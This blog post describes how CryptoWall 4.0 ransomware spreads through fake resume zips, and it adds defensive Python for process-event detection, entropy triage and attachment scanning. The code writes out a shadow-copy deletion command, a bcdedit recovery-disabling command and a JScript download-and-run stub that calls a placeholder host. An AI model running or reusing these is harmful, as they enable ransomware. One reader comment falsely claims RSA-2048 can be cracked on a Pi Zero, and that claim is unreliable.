Cryptolocker new and improved: Cryptowall 4.0

It’s been a long day.  You’re tired… heck you’re exasperated.  You prop your elbows on your desk and sink your chin into both palms.

What a pleasant respite from the day… today was nuts

Suddenly an email pops in your inbox from someone named Maryln.

Hmm… What’s this?

Your curiosity moves your mouse to open the message…

Who is this Maryln person?  Perhaps she’s the perfect hire for the position I posted earlier?

Did you even post a position earlier?  Who cares – it’s so easy to click.

So mindless.

So rewarding.

The mouse makes the unmistakable “click” noise and the document opens.  But behind the scenes a malicious JavaScript file named resume.js downloads analitics.exe, saves it as 160967782.exe and does three things:

  1. Injects itself into explorer.exe and immediately disables System Restore and Startup Repair
  2. Deletes all your Volume Shadow Copies with vssadmin.exe Delete Shadows /All /Quiet
  3. Encrypts the files on your hard drive, on any attached removable drives and USB sticks, and on every mapped network drive, then keeps the only key that can decrypt them out of your reach.  The only way to get your files back is to pay the attackers a whopping $700.  I hope you have backups..

Boom!  You just got punked!

This isn’t some story I made up – this is actually how CryptoWall 4 works.
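The three steps above leave a very recognizable trail in process-creation telemetry (Sysmon Event ID 1, or Security event 4688 with command-line logging turned on). The following detection logic is an added example written for this post, not code from the original article or from any vendor tool: it runs four rules over a constructed set of process-creation events shaped like the chain described above (a script host running resume.js out of Temp, a numerically named .exe launched from Temp, vssadmin deleting shadows as a child of explorer.exe). The bcdedit command used to stand in for “disables Startup Repair” is an assumption; the page itself only names the vssadmin command.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Constructed sample events in the shape of Sysmon Event ID 1 fields
# (pid, parent pid, image path, command line). Not real telemetry.
# The bcdedit line is an assumed way of disabling Startup Repair.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 1180, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 5120, "ppid": 1180, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\vonnie\AppData\Local\Temp\resume.js"'},
    {"pid": 5200, "ppid": 5120, "image": r"C:\Users\vonnie\AppData\Local\Temp\160967782.exe",
     "cmdline": r"C:\Users\vonnie\AppData\Local\Temp\160967782.exe"},
    {"pid": 5260, "ppid": 1180, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 5300, "ppid": 1180, "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": r"bcdedit.exe /set {default} recoveryenabled No"},
    # Benign: an administrator listing shadow copies from an elevated prompt.
    {"pid": 6000, "ppid": 2100, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin.exe list shadows"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Folders an unprivileged user (and therefore a phishing payload) can write to.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (pid, rule-name) pairs for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[int, str]] = []
    for e in events:
        img = basename(str(e["image"]))
        cmd = str(e["cmdline"]).lower()
        parent = by_pid.get(e["ppid"])
        parent_img = basename(str(parent["image"])) if parent else ""

        # Rule 1: a script host executing a script file out of a user-writable folder.
        if img in SCRIPT_HOSTS and USER_WRITABLE.search(str(e["cmdline"])) \
                and re.search(r"\.(js|jse|wsf|vbs)\b", cmd):
            alerts.append((int(e["pid"]), "script-host-dropper"))

        # Rule 2: an .exe in Temp/Downloads whose parent is a script host (download-and-run).
        if parent_img in SCRIPT_HOSTS and USER_WRITABLE.search(str(e["image"])) and img.endswith(".exe"):
            alerts.append((int(e["pid"]), "temp-exe-from-script"))

        # Rule 3: shadow copy deletion. "vssadmin list shadows" is left alone.
        # vssadmin is normally a child of cmd.exe/powershell.exe; a parent of
        # explorer.exe matches the injection described in the post.
        if img == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd:
            rule = "shadow-delete-from-explorer" if parent_img == "explorer.exe" else "shadow-delete"
            alerts.append((int(e["pid"]), rule))

        # Rule 4: boot recovery switched off (assumed command, see comment above).
        if img == "bcdedit.exe" and ("recoveryenabled no" in cmd or "ignoreallfailures" in cmd):
            alerts.append((int(e["pid"]), "recovery-disabled"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 3 is the one worth wiring to a pager: there is almost no legitimate reason for shadow copies to be deleted silently (/Quiet) from a process tree that starts at the user's desktop shell. Rules 1 and 2 fire before the encryption starts, so a host can still be pulled off the network in time to save the mapped drives.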

It’s basically a revised version of CryptoLocker and it’s beginning to wreak havoc on the net.  The worst part is that CryptoWall 4.0 not only scrambles every file on every writable volume connected to your computer, it scrambles the file names too!

So you won’t even know what’s been encrypted – you won’t know what you lost.

Take a look at what happened to my Windows 10 box:

[Screenshot: CryptoWall 4.0, file names scrambled]

After the infection, the names and extensions of my files had been changed so that they are almost completely unrecognizable.  The only substantive bit of information I’m left with is the file size.
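When the names are gone, the content itself still tells you which files were hit: ciphertext is close to uniformly random, whereas documents and text are not. The script below is an added example written for this post (not code from the original article) that triages a folder by Shannon entropy, with a magic-byte check so that JPEGs, ZIPs and PDFs, which are legitimately high-entropy or easily mistaken, are not reported as encrypted. The sample “folder” is constructed in memory from deterministic pseudo-random bytes standing in for ciphertext; it is not real CryptoWall output, and the 7.5 bits/byte threshold is a working assumption.

```python
import math
import random
from collections import Counter
from typing import Dict, Tuple

# Formats that are compressed (or otherwise random-looking) by design. Anything
# else with near-random content is a candidate for "this used to be a document".
KNOWN_MAGIC = {
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip-or-office",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG": "png",
    b"\x1f\x8b": "gzip",
}

ENTROPY_THRESHOLD = 7.5  # bits per byte (assumed); plain text sits around 4-5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes) -> str:
    """'plain', 'compressed-or-media' (high entropy but a known container) or 'likely-encrypted'."""
    kind = next((k for magic, k in KNOWN_MAGIC.items() if data.startswith(magic)), None)
    if shannon_entropy(data) < ENTROPY_THRESHOLD:
        return "plain"
    return "compressed-or-media" if kind else "likely-encrypted"


def triage(files: Dict[str, bytes]) -> Dict[str, Tuple[float, str]]:
    """Map file name -> (entropy rounded to 2 dp, verdict)."""
    return {name: (round(shannon_entropy(d), 2), classify(d)) for name, d in files.items()}


def make_sample_tree() -> Dict[str, bytes]:
    """Constructed stand-in for a post-infection folder. The scrambled names and
    the pseudo-random bodies are invented for this example."""
    rng = random.Random(20151113)

    def rand(n: int) -> bytes:
        return bytes(rng.getrandbits(8) for _ in range(n))

    return {
        "todo.txt": b"Buy milk\nCall Maryln about the resume\n" * 60,
        "report.pdf": b"%PDF-1.4\n" + b"1 0 obj << /Type /Catalog >> endobj\n" * 60,
        "vacation.jpg": b"\xff\xd8\xff\xe0" + rand(4096),   # media: high entropy, known magic
        "7q1z0k.8xq": rand(4096),                           # scrambled name, no magic
        "b2.w1kd": rand(4096),
    }


if __name__ == "__main__":
    for name, (h, verdict) in triage(make_sample_tree()).items():
        print(f"{name:16s} {h:5.2f}  {verdict}")
```

Pair the verdicts with the file sizes from the directory listing and you can usually match a scrambled file back to the entry in your last backup catalogue, which is the one piece of information the renaming does not destroy. Keep the magic-byte list in mind as the main false-positive source: an encrypted file that happens to start with a recognized header would be misfiled as media, so treat “compressed-or-media” as “probably fine”, not “proven fine”.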

Here’s how the CryptoWall 4.0 attack usually works:

An attacker obtains your email address and sends you an unsolicited email with a malicious attachment.  The message usually comes from one of the following sender addresses:

  • beigang45518zheng@163.com
  • mengxiong00539po@163.com
  • xlashan155lu@163.com

and carries one of these attachments:

  • Paulene_resume_9079.zip
  • Ardell_resume_6688.zip
  • Myriam_resume_8347.zip

[Screenshot: CryptoWall 4.0 phishing attempt]

If you click the attachment, extract it and open it, you’ll invoke an obfuscated JavaScript file that immediately tries to download the malware.  A double-clicked .js file on Windows runs under Windows Script Host (wscript.exe) with your own user’s privileges, which is all it needs to reach every drive you can write to.

If you’re a real geek you can view the hybrid-analysis report for the payload sample here.
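The cheapest place to stop this chain is the mail gateway: a “resume” that arrives as a zip containing a .js file should never reach an inbox. Below is an added example written for this post, not code from the original article or from any mail product. It builds a constructed lookalike of the attachment in memory (a zip holding a plain, unobfuscated download-and-run stub standing in for resume.js; the real sample is obfuscated and is not reproduced), then inspects the zip without extracting or running anything. The list of executable extensions and the downloader indicator strings are my assumptions, and the download URL in the stub is a placeholder.

```python
import io
import zipfile
from typing import Any, Dict

# Extensions Windows will execute on double-click (.js runs under Windows Script
# Host). A résumé has no business carrying any of them. Assumed list.
EXECUTABLE_EXT = {".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta", ".exe",
                  ".scr", ".cmd", ".bat", ".ps1", ".lnk"}

# Strings typical of a JScript download-and-run stub. Assumed indicators,
# not taken from the page or from the real sample.
DOWNLOADER_HINTS = ["activexobject", "msxml2.xmlhttp", "adodb.stream",
                    "wscript.shell", "savetofile", ".run(", "eval(", "fromcharcode"]


def make_sample_attachment(malicious: bool = True) -> bytes:
    """Constructed lookalike of the phishing attachment, built in memory.
    The JavaScript is a readable stub written for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        if malicious:
            js = (
                'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
                'var s = new ActiveXObject("ADODB.Stream");\n'
                'x.open("GET", "http://example.invalid/analitics.exe", false); x.send();\n'
                's.Open(); s.Type = 1; s.Write(x.responseBody);\n'
                's.SaveToFile("160967782.exe", 2);\n'
                'new ActiveXObject("WScript.Shell").Run("160967782.exe");\n'
            )
            z.writestr("Paulene_resume_9079/resume.js", js)
        else:
            z.writestr("Paulene_resume_9079/Paulene_resume.pdf",
                       b"%PDF-1.4\n% constructed placeholder, not a real resume\n")
    return buf.getvalue()


def scan_attachment(name: str, data: bytes) -> Dict[str, Any]:
    """Inspect a zip attachment in memory and decide whether to block it."""
    verdict: Dict[str, Any] = {"attachment": name, "members": [], "flagged": [],
                               "score": 0, "block": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return verdict  # not a zip: hand it to whatever scans the other types
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            verdict["members"].append(info.filename)
            base = info.filename.rsplit("/", 1)[-1]
            ext = ("." + base.rsplit(".", 1)[-1].lower()) if "." in base else ""
            if ext not in EXECUTABLE_EXT:
                continue
            text = z.read(info).decode("latin-1").lower()  # read only, never executed
            hits = [h for h in DOWNLOADER_HINTS if h in text]
            verdict["flagged"].append({"member": info.filename, "ext": ext, "hints": hits})
            verdict["score"] += 1 + len(hits)
    # One executable member is enough to quarantine; hints only raise the score.
    verdict["block"] = verdict["score"] >= 1
    return verdict


if __name__ == "__main__":
    print(scan_attachment("Paulene_resume_9079.zip", make_sample_attachment()))
    print(scan_attachment("Paulene_resume_9079.zip", make_sample_attachment(malicious=False)))
```

The decision is made on the member's extension, not on the indicator strings: an obfuscated resume.js would match few or none of the hints, and that is exactly the sample you most want to block. The hints exist to rank what the analyst looks at first. Password-protected zips, which hide their members' content but not their names, are still caught by the extension check.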

But now it’s too late.  In an instant, every file on the connected storage is encrypted with a key you don’t have, and you’re shown a demeaning “tutorial” explaining that you’ve now become part of “a large community CryptoWall”.

When my system was infected the entire process completed in less than 20 seconds.

[Screenshot: CryptoWall 4.0 banner]

Gone in 20 seconds!

Here’s what you’ll find in the “setup guide” (quoted as written, broken English and all):

In case if these simple rules are violated we will not able to help you, and we will not try because you have been warned.
For your attention the software to decrypt the files (as well as the private key that come fitted with it) is a paid product.
After purchasing the software package you can:
1. Decrypt all your files.
2. Work with your documents.
3. View your photos and other media content.
4. Continue your habitual and comfortable work at the computer.
If you are aware whole importance and criticality of the situation, then we suggest you go directly to your personal page where you will be given final instructions, as well as guarantees to restore your files.

Basically the bad guys encrypt all your files (and other people’s files too, if you have mapped network drives) and then hold them hostage until you pay the “CryptoWall Service” fee of $700 USD.

Some people call this malware, others refer to it as ransomware but I call it bullshit.

Who the flip do these guys think they are?  Do they realize how much money they are costing people?

Costing companies?

Do they not realize how much pain and misery they are inflicting upon innocent victims, most of whom don’t have backups and can’t afford to decrypt their files?

I hate this because it takes zero skill to deploy and it exploits the ignorance of perfectly innocent people.  On the one hand, yes – I get it – people shouldn’t open suspicious attachments, but for every 98 users who follow the rules there are always 2 who will click anything that lands in their inbox, and they’ll get infected.  I get it.

These people brought this pain upon themselves, but I hate the cowardice and brazen disrespect these cyber criminals show their victims.  The “help files” are a complete affront to the victim.

Whatever…

[Screenshot: CryptoWall tutorial]

The real problem is that your files are locked with a 2,048-bit RSA key, so brute-forcing the keyspace to recover the original plain-text copies of your data is computationally infeasible.  You’re forced to either pay the ransom, restore from a backup or weep for weeks.

The Bottom Line

Make backups.

That’s the bottom line.  But it’s bigger than that.  If your backups live on an external hard drive that’s always connected to your computer, those files get encrypted right along with everything else.  The same goes for any network storage on your home network that’s mapped as a drive.  You need to be making periodic backups that you keep offline, in a vault, a locked safe or somewhere physically separate from your computer, and you need to have actually tried restoring from them before the day you depend on them.

Think about the cost of your data.  How much is it worth to you?  How hard would it be to get everything back on your computer if you got CryptoWalled tonight?

Leave a comment and tell me what you think about all this.

  • Bok

    Have a client with a receptionist that has been burned by previous CryptoLocker versions TWICE! Fortunately, we had good backups and still do.

  • Peter Psaradellis

    Thanks for this excellent article describing the latest Cryptolocker techniques.

    I have had to personally deal with a few instances of Crypto infections at client sites, and the simplest method is to restore data from backups.
    In a few instances we also restored servers, network data, and OS drives just to be sure.

  • OMGWTFZPMBBQ

    This is old news: I wrote a piece of software that runs on a Pi Zero that can brute force the key using a variant of the number sieve running with a near quantum speedup using inter-row tunneling in the memory chip within a small temperature range.

    Can decode in about 4.5 hours but adding more CPUs drops this substantially.